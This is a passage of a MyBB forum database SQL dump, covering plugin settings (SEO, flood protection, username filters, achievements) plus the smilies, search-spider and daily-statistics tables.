'Titulo de Error', 'Ingresa el titulo a mostrar en el error', 'text', 'Access Denied!', '1', '35', '0'); INSERT INTO mybb_settings VALUES('303', 'ForumsRequirements_body', 'Mensaje de Error', 'Ingresa el mensaje a mostrar en el error', 'textarea', 'You are required to have 5 posts in order to access this forum. ', '2', '35', '0'); INSERT INTO mybb_settings VALUES('304', 'ForumsRequirements_archive', 'Mensaje de Error en el Archivo', 'Ingresa el mensaje a mostrar en el error si intentan ver en el archivo el foro', 'textarea', 'You are required to have 5 posts in order to access this forum. ', '3', '35', '0'); INSERT INTO mybb_settings VALUES('305', 'strictUsernameMode', 'Working mode', 'Depending on this setting, the plugin may reject / allow use of under certain chars.', 'select\nreject=Reject\nallow=Allow\n', 'allow', '1', '36', '0'); INSERT INTO mybb_settings VALUES('306', 'strictUsernameStatusCharsSmall', 'Lowercase', 'Allow/reject: q, w, e, r, t, y, u, i, o, p, a, s, d, f, g, h, j, k, l, z, x, c, v, b, n, m', 'onoff', '1', '2', '36', '0'); INSERT INTO mybb_settings VALUES('307', 'strictUsernameStatusCharsBig', 'Uppercase', 'Allow/reject: Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M', 'onoff', '1', '3', '36', '0'); INSERT INTO mybb_settings VALUES('308', 'strictUsernameStatusNumeric', 'Numbers', 'Allow/reject: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9', 'onoff', '1', '4', '36', '0'); INSERT INTO mybb_settings VALUES('309', 'strictUsernameStatusSpaces', 'Spaces', 'It causes that spaces will be allowed/rejected.', 'onoff', '0', '5', '36', '0'); INSERT INTO mybb_settings VALUES('310', 'strictUsernameStatusPunctuation', 'Punctuation', 'Allow/reject: ., ,, :, ;, !, ?, -, _, [, ], (, ), {, }', 'onoff', '0', '6', '36', '0'); INSERT INTO mybb_settings VALUES('311', 'strictUsernameStatusSpecials', 'Special chars', 'Allow/reject: @, |, #, $, %, ^, *, +, =, /, \\', 'onoff', '0', '7', '36', '0'); INSERT INTO mybb_settings VALUES('312', 'strictUsernameStatusAdditional', 'Additional chars', 'Extra characters to allow/reject, for example national characters. They must be separated by a comma.', 'text', '$,/,\\', '8', '36', '0'); INSERT INTO mybb_settings VALUES('313', 'myflood_posts_onoff', 'MyFlood Post Flood On/Off', 'Turns the MyFlood post flood protection on and off for all usergroups', 'yesno', '1', '1', '37', '0'); INSERT INTO mybb_settings VALUES('314', 'myflood_threads_onoff', 'MyFlood Thread Flood On/Off', 'Turns the MyFlood thread flood protection on and off for all usergroups', 'yesno', '1', '2', '37', '0'); INSERT INTO mybb_settings VALUES('315', 'myflood_ptflood', 'MyFlood post flood includes new threads?', 'If this is set to yes then the post flood protection will count new threads as posts. For this to work the option above must be enabled.', 'yesno', '1', '3', '37', '0'); INSERT INTO mybb_settings VALUES('325', 'moderation_posts_power', 'Power', 'Select Yes if you really wants this plugin to run.', 'yesno', '1', '1', '39', '0'); INSERT INTO mybb_settings VALUES('326', 'moderation_posts_group', 'Allowed_Groups', 'Specify usergroups who can see this. Separate with , if more then one.', 'text', '3,4', '2', '39', '0'); INSERT INTO mybb_settings VALUES('345', 'hidelinks_enabled', 'Enable/Disable', 'Enable Hide Links to Guests ?', 'yesno', '1', '1', '42', '0'); INSERT INTO mybb_settings VALUES('346', 'hidelinks_message', 'Message', 'Insert the message here to be displayed to guests instead of links (You can use HTML):', 'textarea', '<font color=\"red\">Bots cannot see links.</font>', '5', '42', '0'); INSERT INTO mybb_settings VALUES('359', 'google_seo_404', 'Enable Google SEO 404', 'This module replaces the <i>HTTP 200 OK</i> response with <i>HTTP 404 Not Found</i> for invalid thread / forum / etc error pages and provides additional functionality for 404 error pages. You can also do custom 404 error pages by adding an ErrorPage directive to your .htaccess. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO 404. Setting this to NO also disables all other settings in the Google SEO 404 settings group.', 'yesno', '1', '1', '45', '0'); INSERT INTO mybb_settings VALUES('360', 'google_seo_meta', 'Enable Google SEO Meta', 'This module generates meta tags for the current page. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Meta. Setting this to NO also disables all other settings in the Google SEO Meta settings group.', 'yesno', '1', '2', '45', '0'); INSERT INTO mybb_settings VALUES('361', 'google_seo_redirect', 'Enable Google SEO Redirect', 'This module redirects old and invalid URLs to their current proper names. This can be used for all sorts of redirections: redirect to the main site if your forum is available under several domain names, redirect stock MyBB URLs to Google SEO URLs (or the other way around). This prevents your users and Google from seeing the same page under several different names. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Redirect. Setting this to NO also disables all other settings in the Google SEO Redirect settings group.', 'yesno', '0', '3', '45', '0'); INSERT INTO mybb_settings VALUES('362', 'google_seo_sitemap', 'Enable Google SEO Sitemap', 'This module provides <a href=\"http://sitemaps.org/\">XML Sitemap</a> for your forum. This makes it easier for Google to discover pages on your site. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Sitemap. Setting this to NO also disables all other settings in the Google SEO Sitemap settings group.', 'yesno', '1', '4', '45', '0'); INSERT INTO mybb_settings VALUES('363', 'google_seo_url', 'Enable Google SEO URL', 'This module replaces the stock MyBB URLs with descriptive URLs that use words (thread subject, forum title, user name, etc) instead of random numeric IDs. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO URL. Setting this to NO also disables all other settings in the Google SEO URL settings group.', 'yesno', '0', '5', '45', '0'); INSERT INTO mybb_settings VALUES('364', 'google_seo_404_widget', '404 widget', 'Add the Google 404 widget for 404/403 error pages.', 'yesno', '1', '1', '46', '0'); INSERT INTO mybb_settings VALUES('365', 'google_seo_404_wol_show', 'Show 404 errors in Who\'s Online', 'Specify if you want to show that users are seeing the 404 error page in the Who\'s Online list. This is not recommended. Enabling this can cause problems such as spambots showing up as guests, or users showing up as seeing error pages if your forum e.g. tries to include an image that does not exist.', 'radio\n0=No\n1=Yes\n2=Yes, including URI', '0', '2', '46', '0'); INSERT INTO mybb_settings VALUES('366', 'google_seo_404_status', 'Customize HTTP status codes', 'Specify which <a href=\"http://en.wikipedia.org/wiki/List_of_HTTP_status_codes\" target=\"_blank\">HTTP status code</a> should be returned for specific error pages. You can specify one status code per line followed by = and a comma-separated list of error labels, which may include wildcards. By default, the returned status code is 404 Not Found.', 'php\n<textarea name=\\\"upsetting[{$setting[\'name\']}]\\\" rows=\\\"5\\\" cols=\\\"80\\\" wrap=\\\"off\\\">\".htmlspecialchars($setting[\'value\']).\"</textarea>', '404 Not Found=*\r\n403 Forbidden=no_permission\r\n503 Service Unavailable=boardclosed\r\n200 OK=nosearchresults,redirect_*', '3', '46', '0'); INSERT INTO mybb_settings VALUES('367', 'google_seo_404_debug', 'Debug 404 error labels', 'Setting this to Yes will show an error label on error pages. The labels can then be used to configure custom error codes for that page.', 'yesno', '0', '4', '46', '0'); INSERT INTO mybb_settings VALUES('368', 'google_seo_meta_length', 'Meta description', 'Generate Meta description tags based on the contents of the current page (description of a forum, first posting of a thread, ...). Set to the maximum description length you want to allow or to 0 to disable.', 'text', '200', '1', '47', '0'); INSERT INTO mybb_settings VALUES('369', 'google_seo_meta_canonical', 'Canonical Page', 'Specify a canonical page. This helps avoid Google indexing the same page under several different names. Please see <a href=\"http://www.google.com/support/webmasters/bin/answer.py?hl=en&amp;answer=139394\">About rel=\"canonical\"</a> for details.', 'yesno', '1', '2', '47', '0'); INSERT INTO mybb_settings VALUES('370', 'google_seo_meta_archive', 'Meta for Archive Mode', 'Enable this option if you want tags to be added to MyBB\'s Lite (Archive) Mode pages. If this setting is disabled, Google SEO Meta will ignore the Archive mode altogether.', 'yesno', '1', '3', '47', '0'); INSERT INTO mybb_settings VALUES('371', 'google_seo_meta_page', 'Provide page number for forum and thread titles', 'If set, initialize a variable for forum and thread pages &gt; 1. {page} stands for Page (translatable in googleseo.lang.php), {number} for the actual page number. Edit your <i>forumdisplay</i> and <i>showthread</i> templates to include <i>{$google_seo_page}</i> in the &lt;title&gt; tag.', 'text', ' - {page} {number}', '4', '47', '0'); INSERT INTO mybb_settings VALUES('372', 'google_seo_meta_nofollow', 'Nofollow links', 'Give recently posted links the <a href=\"http://en.wikipedia.org/wiki/Nofollow\" target=\"_blank\">Nofollow</a> attribute. If your forum gets spammed, this will give you time to moderate, while still giving reputation to outgoing links in the long run. The default value is 7.0 days (one week). Set to 0 to disable, or -1 for infinite duration (not recommended).', 'text', '7.0', '5', '47', '0'); INSERT INTO mybb_settings VALUES('373', 'google_seo_meta_noindex_fids', 'Noindex forums', 'If you want to prevent one or more forums and its threads from being indexed by search engines altogether, enter a comma separated list of forum IDs here. This is not recommended but might be useful for trashcan or duplicate content forums.', 'text', 'http://l33thacking.net/forum-46.html', '6', '47', '0'); INSERT INTO mybb_settings VALUES('374', 'google_seo_redirect_permission', 'Permission Checks', 'Should Redirect let permission checks run first? Enabling this option will prevent Redirect from redirecting URLs for items that the user is not allowed to access anyway. This is probably only necessary if you\'re also using SEO URLs and you\'re concerned about users getting redirected to the SEO URL of a forum / thread they\'re not allowed to read, which would give away the subject in the SEO URL.', 'yesno', '0', '1', '48', '0'); INSERT INTO mybb_settings VALUES('375', 'google_seo_redirect_posts', 'Redirect Post Links', 'MyBB allows linking to specific posts by specifying the post ID (pid) in the URL. Redirect can trust the thread ID (tid) it tid was given and query it if it was not (default MyBB behaviour), or it can verify the tid (by making a query) in order to redirect links to posts that were moved to another thread, or it can ignore these links completely (avoiding the tid query altogether).', 'radio\ndefault=Default (query on demand)\nverify=Verify (always query)\nignore=Ignore (never query)', 'default', '2', '48', '0'); INSERT INTO mybb_settings VALUES('376', 'google_seo_redirect_litespeed', 'LiteSpeed Bug workaround', 'If your server is running LiteSpeed &lt;= 4.0.10 instead of Apache, and you see redirection loops on member profile / send mail or calendar event / edit event pages, you are suffering from a bug in LiteSpeed\'s mod_rewrite replacement. Set to YES to work around this bug - Google SEO Redirect will then leave the problematic pages alone. Apache / Nginx / lighttpd users can leave this at NO.', 'yesno', '0', '3', '48', '0'); INSERT INTO mybb_settings VALUES('377', 'google_seo_redirect_debug', 'Debug Redirect', 'If you experience infinite redirection loops due to Google SEO Redirect, please enable this option to obtain more information about what is going wrong with your redirect and then report a bug to the plugin author. The debug information is ugly and therefore shown only to board admins.', 'yesno', '0', '4', '48', '0'); INSERT INTO mybb_settings VALUES('378', 'google_seo_sitemap_url', 'Sitemap URL scheme', 'This is the URL scheme used for the XML Sitemap pages. By default, this is <i>sitemap-{url}.xml</i> and your sitemap will be called <i>sitemap-index.xml</i>. Please note that if you change this, you will also need to add a new rewrite rule to your .htaccess. If your host does not support mod_rewrite, leave this empty. Your sitemap will then be called <i>misc.php?google_seo_sitemap=index</i>.', 'text', 'sitemap-{url}.xml', '1', '49', '0'); INSERT INTO mybb_settings VALUES('379', 'google_seo_sitemap_forums', 'Forums', 'Include Forums in the XML Sitemap.', 'radio\n0=No\n1=Yes\n2=Yes, including forum pages', '1', '2', '49', '0'); INSERT INTO mybb_settings VALUES('380', 'google_seo_sitemap_threads', 'Threads', 'Include Threads in the XML Sitemap.', 'radio\n0=No\n1=Yes\n2=Yes, including thread pages', '1', '3', '49', '0'); INSERT INTO mybb_settings VALUES('381', 'google_seo_sitemap_users', 'Users', 'Include Users in the XML Sitemap.', 'yesno', '1', '4', '49', '0'); INSERT INTO mybb_settings VALUES('382', 'google_seo_sitemap_announcements', 'Announcements', 'Include Announcements in the XML Sitemap.', 'yesno', '1', '5', '49', '0'); INSERT INTO mybb_settings VALUES('383', 'google_seo_sitemap_calendars', 'Calendars', 'Include Calendars in the XML Sitemap.', 'yesno', '0', '6', '49', '0'); INSERT INTO mybb_settings VALUES('384', 'google_seo_sitemap_events', 'Events', 'Include Events in the XML Sitemap.', 'yesno', '0', '7', '49', '0'); INSERT INTO mybb_settings VALUES('385', 'google_seo_sitemap_additional', 'Additional Pages', 'List of additional URLs relative to your site that should be included in the XML Sitemap. If you have any custom pages you can include them here, one page per line. Entries must be relative to your site, i.e. they must not contain http://, and must not start with .. or /.', 'textarea', 'index.php\r\n', '8', '49', '0'); INSERT INTO mybb_settings VALUES('386', 'google_seo_sitemap_pagination', 'Sitemap Pagination', 'Set the maximum number of items that may appear in a single XML Sitemap before it is split (not counting optional forum/thread pages). Setting it too low will result in too many sitemaps, setting it too high may cause server load every time the sitemap is generated. If unsure, leave at 1000.', 'text', '1000', '9', '49', '0'); INSERT INTO mybb_settings VALUES('387', 'google_seo_url_query_limit', 'Query Limit', 'Google SEO uses the database to store, and subsequently query, unique SEO URLs for every forum, thread, etc. While these queries are fast and usually low in number, in some cases the total number of queries per request may exceed sane values. Possible causes for this are new installs in large forums when lots of SEO URLs have to be created for the first time, as well as plugins that add lots of unexpected links on a page. Limiting the total number of queries per request helps to avoid load spikes. Stock URLs will appear for the links that couldn\'t be queried due to this limit.<p>Set the total number of queries URL is allowed to use in a single request. Default is 50. Set to 0 for no limit.</p>', 'text', '50', '1', '50', '0'); INSERT INTO mybb_settings VALUES('388', 'google_seo_url_mode', 'Evaluation Mode', 'In Full Mode (which is the default), Google SEO will query and return SEO URLs directly at the time they are requested. This is the most reliable method but it will probably use more than just one database query, depending on how well Google SEO can predict which links will show up on a page. In Lazy Mode, Google SEO will first collect all links created on a page, and only at the very end obtain all SEO URLs in a single query and replace their stock URL counterparts in the output. This reduces queries to a minimum, at the cost of PHP processing time and reliability.', 'radio\n0=Full Mode (Default)\nlazy=Lazy Mode', '0', '2', '50', '0'); INSERT INTO mybb_settings VALUES('389', 'google_seo_url_cache', 'Use MyBB\'s Cache system for SEO URLs', 'If set, the cache will be populated with the URLs used on the specified pages (by default, index.php and portal.php). Under ideal conditions this will reduce the need for additional queries as the required URLs will already be available from the cache. If the setting starts with a number, the cache will be flushed every x minutes (otherwise it defaults to 15 minutes). Set to empty to disable.<p>Warning: Do not include pages which contain unlimited/all URLs like forumdisplay/showthread. They would make the cache grow too large to be useful.</p>', 'text', '15,index.php,', '3', '50', '0'); INSERT INTO mybb_settings VALUES('390', 'google_seo_url_punctuation', 'Punctuation characters', 'Punctuation and other special characters are filtered from the URL string and replaced by the separator. By default, this string contains all special ASCII characters including space. If you are running an international forum with non-ASCII script, you might want to add unwanted punctuation characters of those scripts here.', 'text', '!\"#$%&\'( )*+,-./:;<=>?@[\\]^_`{|}~', '4', '50', '0'); INSERT INTO mybb_settings VALUES('391', 'google_seo_url_separator', 'URL separator', 'Enter the separator that should be used to separate words in the URLs. By default this is - which is a good choice as it is easy to type in most keyboard layouts (single keypress without shift/alt modifier). If you want some other character or string as a separator, you can enter it here. Please note that special characters like :&amp;?@/ or space could render your URLs unuseable or hard to work with.', 'text', '-', '5', '50', '0'); INSERT INTO mybb_settings VALUES('392', 'google_seo_url_uniquifier', 'URL uniquifier', 'In case of URL collisions (for example two threads with the same title), the uniquifier is applied to the URL of the newer thread. To guarantee uniqueness, the uniquifier must incorporate the ID and use punctuation other than a single separator. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for examples of good and bad uniquifiers.', 'text', '{url}{separator}{separator}{id}', '6', '50', '0'); INSERT INTO mybb_settings VALUES('393', 'google_seo_url_uniquifier_force', 'URL uniquifier enforcer', 'This option is NOT recommended. If you set this to yes, Google SEO will be forced to use the uniquifier for all URLs without exception, even if it\'s not necessary. Use this only if you absolutely want every URL to contain the ID. If you enable this, a single separator will be sufficient for the uniquifier.', 'yesno', '0', '7', '50', '0'); INSERT INTO mybb_settings VALUES('394', 'google_seo_url_translation', 'Character Translation', 'If you want to replace some characters (German umlaut example: Übergrößenträger -&gt; Uebergroessentraeger) or words in your URLs, please add your translations here. You can specify one character per line followed by = and the replacement character. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.', 'php\n<textarea name=\\\"upsetting[{$setting[\'name\']}]\\\" rows=\\\"5\\\" cols=\\\"80\\\" wrap=\\\"off\\\">\".htmlspecialchars($setting[\'value\']).\"</textarea>', '', '8', '50', '0'); INSERT INTO mybb_settings VALUES('395', 'google_seo_url_lowercase', 'lowercase words', 'If you prefer lower case URLs, you can set this to YES. This will not affect the way URLs are stored in the database so you can go back to the original case letters any time. Please note that if you set this to YES, you will also have to make sure that your forum URL, as well as scheme and uniqufier are all lowercase too for the URL to be completely in lower case.', 'yesno', '0', '9', '50', '0'); INSERT INTO mybb_settings VALUES('396', 'google_seo_url_length_soft', 'URL length soft limit', 'URLs can be shortened after a soft limit by truncating it after a word (punctuation separator). Set to 0 to disable.', 'text', '0', '10', '50', '0'); INSERT INTO mybb_settings VALUES('397', 'google_seo_url_length_hard', 'URL length hard limit', 'URLs can be shortened after a hard limit by truncating it regardless of word separators. Set to 0 to disable.', 'text', '0', '11', '50', '0'); INSERT INTO mybb_settings VALUES('398', 'google_seo_url_posts', 'Handle Post Links', 'MyBB allows linking to specific posts by specifying the post ID (pid) in the URL. URL can trust the thread ID (tid) it tid was given and query it if it was not (default), or it can verify the tid (by making a query) in order to show correct links to posts at all times, or it can ignore these links completely (avoiding the tid query altogether by showing a stock post URL).', 'radio\ndefault=Default (query on demand)\nverify=Verify (always query)\nignore=Ignore (never query)', 'default', '12', '50', '0'); INSERT INTO mybb_settings VALUES('399', 'google_seo_url_multipage', 'Handle multipage links', 'MyBB uses a special multipage() function to produce pagination links for all sorts of things, including forum and thread pages. Set this to Yes to allow Google SEO to attempt replacing these with their SEO URL counterparts, otherwise no.', 'yesno', '0', '13', '50', '0'); INSERT INTO mybb_settings VALUES('400', 'google_seo_url_forums', 'Forum URL scheme', 'Enter the Forum URL scheme. By default this is <i>Forum-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Forums.', 'text', 'forum-{url}', '14', '50', '0'); INSERT INTO mybb_settings VALUES('401', 'google_seo_url_threads', 'Thread URL scheme', 'Enter the Thread URL scheme. By default this is <i>Thread-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Threads.', 'text', 'thread-{url}', '15', '50', '0'); INSERT INTO mybb_settings VALUES('402', 'google_seo_url_threadprefix', 'Thread Prefixes', 'Include thread prefixes in thread URLs?', 'text', '{prefix}{separator}{url}', '16', '50', '0'); INSERT INTO mybb_settings VALUES('403', 'google_seo_url_announcements', 'Announcement URL scheme', 'Enter the Announcement URL scheme. By default this is <i>Announcement-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Announcements.', 'text', 'announcement-{url}', '17', '50', '0'); INSERT INTO mybb_settings VALUES('404', 'google_seo_url_users', 'User URL scheme', 'Enter the User URL scheme. By default this is <i>User-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Users.', 'text', 'user-{url}', '18', '50', '0'); INSERT INTO mybb_settings VALUES('405', 'google_seo_url_calendars', 'Calendar URL scheme', 'Enter the Calendar URL scheme. By default this is <i>Calendar-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Calendars.', 'text', 'calendar-{url}', '19', '50', '0'); INSERT INTO mybb_settings VALUES('406', 'google_seo_url_events', 'Event URL scheme', 'Enter the Event URL scheme. By default this is <i>Event-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Events.', 'text', 'event-{url}', '20', '50', '0'); INSERT INTO mybb_settings VALUES('407', 'google_seo_url_parent_forum', 'Include parent forum in forum URLs?', 'Set the scheme that should be used to include the parent forum in the forum URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the forum itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for forum URLs.', 'text', 'forumdisplay.php?{url}', '21', '50', '0'); INSERT INTO mybb_settings VALUES('408', 'google_seo_url_parent_thread', 'Include parent forum in thread URLs?', 'Set the scheme that should be used to include the parent forum in the thread URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the thread itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for thread URLs.', 'text', 'showthread.php?{url}', '22', '50', '0'); INSERT INTO mybb_settings VALUES('409', 'google_seo_url_parent_announcement', 'Include parent forum in announcement URLs?', 'Set the scheme that should be used to include parent forum in the announcement URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the announcement itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for announcement URLs.', 'text', 'announcements.php?{url}', '23', '50', '0'); INSERT INTO mybb_settings VALUES('410', 'google_seo_url_parent_event', 'Include parent calendar in event URLs?', 'Set the scheme that should be used to include parent calendar in the event URL. {parent} is the Google SEO URL of the parent calendar, {url} the URL of the event itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for event URLs.', 'text', 'calendar.php?action=event&{url}', '24', '50', '0'); INSERT INTO mybb_settings VALUES('411', 'courtesyedittime', 'Courtesy Edit Time', 'Enter the number of seconds that the \'edited by\' message will not show for. As an example, if you put 60 in the box, users will be able to edit their posts for 60 seconds before the \'edited by\' message will be added.', 'text', '180', '1', '51', '0'); INSERT INTO mybb_settings VALUES('432', 'achivements_taskuseroffline', 'Give users offline achievements', 'Achievements also want to give users that have not been active before the last execution of the task?', 'yesno', '1', '10', '0', '0'); INSERT INTO mybb_settings VALUES('431', 'achivements_maxpostbit', 'Achievements maxima of postbit', 'Enter the maximium number of achievements that will be displayed in the user\'s postbit.', 'text', '13', '9', '0', '0'); INSERT INTO mybb_settings VALUES('430', 'achivements_rebuild', 'refresh achievements', 'refresh achievements', 'yesno', '0', '8', '0', '0'); INSERT INTO mybb_settings VALUES('429', 'achivements_usermp', 'User', 'Write the name of the user that sent the PM.', 'text', '61', '7', '0', '0'); INSERT INTO mybb_settings VALUES('428', 'achivements_bodymp', 'Message from PM', 'Enter your message private message. Write\r\n<ul>\r\n<li>{user} to show the user name</li>\r\n<li>{bbname} to show the forum name</li>\r\n<li>{bburl} to show the url of the forum</li>\r\n<li>{name} to display the name of the achievement</li>\r\n<li>{description} to display the description / reason for the achievement</li>\r\n<li>{image} to show the image of achievement</li>\r\n</ul>', 'textarea', 'Hi [b]{user}[/b] You have been granted an award on [url={bburl}][b]{bbname}[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: {name}\r\nDescription: {description}\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '6', '0', '0'); INSERT INTO mybb_settings VALUES('426', 'achivements_sendmp', 'Send PM', '', 'textarea', 'a:3:{s:5:\"posts\";s:1:\"1\";s:7:\"threads\";s:1:\"1\";s:6:\"custom\";s:1:\"1\";}', '4', '0', '0'); INSERT INTO mybb_settings VALUES('427', 'achivements_subjectmp', 'Subject PM', 'Write the title of the private message.', 'textarea', 'You have been granted an award.', '5', '0', '0'); INSERT INTO mybb_settings VALUES('425', 'achivements_showachvpostbit', 'Achievements in Postbit', 'Show achievements in postbit for users?', 'yesno', '1', '3', '0', '0'); INSERT INTO mybb_settings VALUES('423', 'achivements_enable', 'Enable', 'Enable / disable the plugin. If disabled not lost user data (the gains are still displayed unless you disable these options).', 'yesno', '1', '1', '0', '0'); INSERT INTO mybb_settings VALUES('424', 'achivements_showachvprofile', 'Achievement Profile', 'Show achievements in the users profile?', 'yesno', '1', '2', '0', '0'); INSERT INTO mybb_settings VALUES('433', 'achivements_modcp', 'Give custom achievements from ModCP?', 'Want achievements that may occur from the ModCP custom? This will allow moderators and super moderators can provide custom achievements.', 'yesno', '1', '11', '0', '0'); INSERT INTO mybb_settings VALUES('434', 'hideUntilPost_link_enabled', 'Enable/Disable', 'Hide links until post has been made?', 'yesno', '0', '1', '52', '0'); INSERT INTO mybb_settings VALUES('435', 'hideUntilPost_lock_enabled', 'Enable/Disable', 'Enable lock bbcode? (Everything inside [lock]...[/lock] will be hiden until post is made)', 'yesno', '1', '2', '52', '0'); INSERT INTO mybb_settings VALUES('436', 'hideUntilPost_attach_enabled', 'Enable/Disable', 'Hide attachments until post has been made?', 'yesno', '0', '3', '52', '0'); INSERT INTO mybb_settings VALUES('437', 'hideUntilPost_gid_exclude', 'Exclude Groups', 'Enter the usergroups IDs separated by commas which this plugin should not apply. 0 = No usergroups excluded. (Still won\'t apply for mods and admins)', 'text', '0', '4', '52', '0'); INSERT INTO mybb_settings VALUES('438', 'hideUntilPost_fid_exclude', 'Exclude Forums', 'Enter the forum IDs separated by commas which this plugin should not apply. 0 = Applies for all forums.', 'text', '64', '5', '52', '0'); DROP TABLE IF EXISTS mybb_smilies; CREATE TABLE mybb_smilies ( sid smallint(5) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, find varchar(120) NOT NULL, image varchar(220) NOT NULL, disporder smallint(5) unsigned NOT NULL, showclickable int(1) NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_smilies VALUES('39', 'ROFL', ':roflol:', 'images/smilies/Clean/24.gif', '1', '1'); INSERT INTO mybb_smilies VALUES('56', 'Devil', ':evil:', '/images/smilies/Clean/devil.png', '2', '1'); INSERT INTO mybb_smilies VALUES('41', 'Smile', ':)', '/images/smilies/Clean/smiling.png', '0', '1'); INSERT INTO mybb_smilies VALUES('42', 'Confused', ':?:', '/images/smilies/Clean/huh.png', '0', '1'); INSERT INTO mybb_smilies VALUES('43', 'Cool', ':cool:', '/images/smilies/Clean/cool.png', '0', '1'); INSERT INTO mybb_smilies VALUES('44', 'Surprised', ':O', '/images/smilies/Clean/surprised.png', '0', '1'); INSERT INTO mybb_smilies VALUES('45', 'Angel', ':angel:', '/images/smilies/Clean/angel.png', '0', '1'); INSERT INTO mybb_smilies VALUES('46', 'Embarrased', ':embarrased:', '/images/smilies/Clean/embarrased.png', '0', '1'); INSERT INTO mybb_smilies VALUES('47', 'Wink', ';)', '/images/smilies/Clean/wink.png', '0', '1'); INSERT INTO mybb_smilies VALUES('48', 'Tounge', ':P', '/images/smilies/Clean/tounge.png', '0', '1'); INSERT INTO mybb_smilies VALUES('49', 'Lub', '<3', '/images/smilies/Clean/lub.png', '0', '1'); INSERT INTO mybb_smilies VALUES('50', 'Grin', ':D', '/images/smilies/Clean/happy.png', '0', '1'); INSERT INTO mybb_smilies VALUES('51', 'Mad', ':angry:', '/images/smilies/Clean/mad.png', '0', '1'); INSERT INTO mybb_smilies VALUES('52', 'Sad', ':(', '/images/smilies/Clean/sad.png', '0', '1'); INSERT INTO mybb_smilies VALUES('53', 'Crying', ':\'(', '/images/smilies/Clean/crying.png', '0', '1'); INSERT INTO mybb_smilies VALUES('54', 'Hehe!', ':hehe!:', '/images/smilies/Clean/hehe!.png', '0', '1'); DROP TABLE IF EXISTS mybb_spiders; CREATE TABLE mybb_spiders ( sid int(10) unsigned NOT NULL auto_increment, name varchar(100) NOT NULL, theme int(10) unsigned NOT NULL, language varchar(20) NOT NULL, usergroup int(10) unsigned NOT NULL, useragent varchar(200) NOT NULL, lastvisit bigint(30) NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_spiders VALUES('1', 'Google', '0', '', '8', 'Googlebot', '1352759053'); INSERT INTO mybb_spiders VALUES('7', 'Bing', '0', '', '8', 'msnbot', '1351442860'); INSERT INTO mybb_spiders VALUES('8', 'Yahoo!', '0', '', '8', 'Slurp', '1351027504'); INSERT INTO mybb_spiders VALUES('9', 'Baidu', '0', '', '8', 'Baiduspider', '1349995130'); INSERT INTO mybb_spiders VALUES('93', 'DuckDuckBot', '0', '', '8', 'DuckDuckBot', '0'); INSERT INTO mybb_spiders VALUES('16', 'Google-Image', '0', '', '8', 'Googlebot-Image', '1352252605'); INSERT INTO mybb_spiders VALUES('18', 'Alexa Internet', '0', '', '8', 'ia_archiver', '1352743883'); INSERT INTO mybb_spiders VALUES('96', 'Web Archive ', '0', '', '8', 'archive.org_bot', '0'); DROP TABLE IF EXISTS mybb_stats; CREATE TABLE mybb_stats ( dateline bigint(30) NOT NULL, numusers int(10) unsigned NOT NULL, numthreads int(10) unsigned NOT NULL, numposts int(10) unsigned NOT NULL, PRIMARY KEY (dateline) ); INSERT INTO mybb_stats VALUES('1339704000', '1', '1', '1'); INSERT INTO mybb_stats VALUES('1339876800', '3', '2', '4'); INSERT INTO mybb_stats VALUES('1339963200', '4', '9', '17'); INSERT INTO mybb_stats VALUES('1340049600', '4', '16', '39'); INSERT INTO mybb_stats VALUES('1340136000', '4', '17', '42'); INSERT INTO mybb_stats VALUES('1340308800', '4', '17', '44'); INSERT INTO mybb_stats VALUES('1340481600', '5', '19', '50'); INSERT INTO mybb_stats VALUES('1340568000', '5', '22', '58'); INSERT INTO mybb_stats VALUES('1340654400', '5', '22', '59'); INSERT INTO mybb_stats VALUES('1340740800', '5', '23', '61'); INSERT INTO mybb_stats VALUES('1340827200', '5', '24', '70'); INSERT INTO mybb_stats VALUES('1341172800', '5', '26', '72'); INSERT INTO mybb_stats VALUES('1341432000', '6', '32', '83'); INSERT INTO mybb_stats VALUES('1341608400', '8', '32', '84'); INSERT INTO mybb_stats VALUES('1341694800', '9', '32', '84'); INSERT INTO mybb_stats VALUES('1341867600', '10', '32', '84'); INSERT INTO mybb_stats VALUES('1342040400', '12', '42', '97'); INSERT INTO mybb_stats VALUES('1342126800', '13', '44', '108'); INSERT INTO mybb_stats VALUES('1342213200', '16', '46', '115'); INSERT INTO mybb_stats VALUES('1342299600', '17', '48', '117'); INSERT INTO mybb_stats VALUES('1342386000', '19', '56', '133'); INSERT INTO mybb_stats VALUES('1343854800', '22', '56', '134'); 